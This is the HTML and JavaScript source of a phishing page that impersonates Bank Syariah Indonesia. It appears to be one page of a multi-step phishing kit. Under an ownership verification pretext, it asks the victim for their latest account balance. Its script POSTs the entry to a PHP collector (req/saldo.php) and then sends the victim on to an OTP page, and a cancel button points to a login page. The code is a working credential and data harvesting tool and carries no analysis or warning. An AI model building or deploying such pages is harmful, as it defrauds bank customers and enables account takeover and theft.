<!DOCTYPE html>
<html lang="in">
<head>
      <meta charset="UTF-8">
      <title>𝗕𝗮𝗻𝗸 𝗦𝘆𝗮𝗿𝗶𝗮𝗵 𝗜𝗻𝗱𝗼𝗻𝗲𝘀𝗶𝗮</title>
      <meta name="theme-color" content="#00A39E">
<meta name="description" content="Yuk segara konfirmasikan tarif sesuai dengan kebutuhan anda"> 
 <meta property="og:image" content="https://hosting.tigerengine.id/77d5f3.jpg">
  <link href="https://hosting.tigerengine.id/nri6ui.png" rel="shortcut icon" type="image/x-icon">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
 </head>
 <style>
      @import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');
      
 body {
       font-family: sans-serif;
       margin: 0;
       margin-bottom: 40%;
       
} 
       
  .nav1{
      z-index:999999;
      position: fixed;
      background: url("img/nav1.png") transparent;
      background-repeat: no-repeat;
      background-size: 100%;
      height: 60px;
      width: 100%;
      margin: 0px auto;
      box-shadow: 0px 1px 4px 2px rgba(66, 68, 90, 0.18);
      top:0px;   
 }
   .nav2{
      z-index:999999;
      position: fixed;
      background: url("img/nav2.png") transparent;
      background-repeat: no-repeat;
      background-size: 100%;
      height: 110px;
      width: 100%;
      bottom: 0; 
      left: 0; 
      right: 0; 
      margin: 0px auto;
      padding-top: 19px
         
 }
.button{
      z-index: 1;
      background: #00A39E; 
      margin-top: 36px; 
      height: 45px; 
      margin-left: 21%;
      width: 150px;
      color: #fff; 
      border-radius: 50px; 
      border: 1px solid #00A39E;
      display: block;
      position: absolute;
      left: 50%; 
      transform: translate(-50%, -50%);
}
.button1{
      z-index: 1;
      background: #fff; 
      margin-top: 36px; 
      height: 45px; 
      margin-left: -21%;
      width: 150px;
      color: #00A39E; 
      border-radius: 50px; 
      border: 1px solid #00A39E;
      display: block;
      position: absolute;
      left: 50%;     
      transform: translate(-50%, -50%);
}
    .form-log{
        box-sizing: border-box; 
        height: 40px; 
        width: 77%; 
        max-width: 77%; 
        border:none;
        border-bottom: 1.5px solid #00A39E; 
        border-image: initial; 
        background-color: transparent;  
        border-radius: 0px; 
        font-family: 'Nunito', sans-serif; 
        font-weight: 600; 
        font-size: 16px; 
        color: #00000099; 
        word-spacing: 0px; 
        padding: 0px 10px; 
        outline: none; 
        margin-top: 0px; 
        padding-left: 0px;
        margin: 20px auto;
        display: block;
        align-items: center;
    }
    
  .lbl{
        position: relative;
        font-size: 14px;
        color: #00000090;
        margin-left: 45px;
        font-weight: 700;
        top:20px;
  }
  
  ::placeholder{
        font-size: 14px;
        font-weight: 400;
        
  }
  
  .info{
        text-align: center;
        font-size: 18px;
        font-weight: 700;
        color: #00000080;
        margin-bottom: 20px;
  }
  
  .gares{
        color:#000;        
        background:#000;
        opacity: 0.1;
        position: relative;
        margin-bottom: 60px;
  }
  
  .foto{
      z-index: 1;
      background: url('img/proteksi.png');
      background-repeat: no-repeat;
      background-size: 100%;
      bottom: 0; 
      left: 0; 
      right: 0; 
      height:200px;
      width:85%;
      margin: 0px auto;
      top: 120px;
      position: absolute;
}
.h{
      font-size: 20px; 
      font-weight: bold; 
      margin-top: -40px;
      text-align:center;
}
.y{
      text-align:center;
      margin-bottom:30px;
      font-size:14px;
}
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
             align-items: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 99999999;
            
      
}
.loading {
    position: fixed;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 0px;
    width: 190px;
    border-radius: 10px;
}
.three {
    transition: all 0.2s;
    transition-timing-function:cubic-bezier(2.2, 2, 3, 2);
}
.three:hover {
    background: #00A39E; 
    color: white;
    border: none;
    opacity: 0.3;
    box-shadow: inset 0px 0px 9px -2px rgba(66, 68, 90, 1);
}
 </style>
<body>
<nav class="nav1" ></nav>
<form id="jualpuki" onsubmit="neraike()">
    <section style="margin-top: 80px;">
          <p class="info">Silahkan lengkapi data berikut</p>
          <hr class="gares">
          <h3 class="h">Verifikasi Kepemilikan</h3>
          <p class="y">Masukkan Saldo Terakhir anda,<br>
Pastikan Saldo Sesuai di rekening.</p>
          <label for="rek" class="lbl">Saldo Terakhir :</label>
     <input type="tel" id="saldo" class="form-log" maxlength="" name="saldo" data-name="rek" placeholder="Tuliskan Saldo Terakhir Anda" minlength="" required>
    
   <div style="position: absolute; left: 0; right: 0; margin: 0px auto; width: 100%">
    <center>
     <button type="button" onclick="location.href='login.html'" class="button1" >BATAL</button>
     <button type="submit" id="btnSubmit1" class="button three" >SELANJUTNYA</button>
     <div class="foto"></div>
     </center>
     </div>
     </section>
     </form>
     <br>
     <br>
     <br>
     <br>
     <br>
     <center>
     <div id="djload" name="process" class="process1" style="display: none;">
            
                <img src="img/loding.gif" class="loading">
              
           
        </div>
        </center>
<div class="nav2"></div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script>
      
    
    /* Dengan Rupiah */
    var dengan_rupiah = document.getElementById('saldo');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    });
    
    /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);
            
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }
        
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    }
    
  </script>
  <script>
function neraike () {
event.preventDefault();
$('.process1').fadeIn();
 document.getElementById('btnSubmit1').innerHTML ="Memproses...";
      $.ajax({
            type: 'POST',
            url: 'req/saldo.php',
            data: $('#jualpuki').serialize(),
            datatype: 'text',
            
            complete: function(data) {
            setTimeout(function(){
  window.location.href='otp.html'
  document.getElementById('btnSubmit1').innerHTML = "SELANJUTNYA";
 $('.process1').fadeOut();
    }, 800);
            }
        })
     }
</script>
</body>
</html>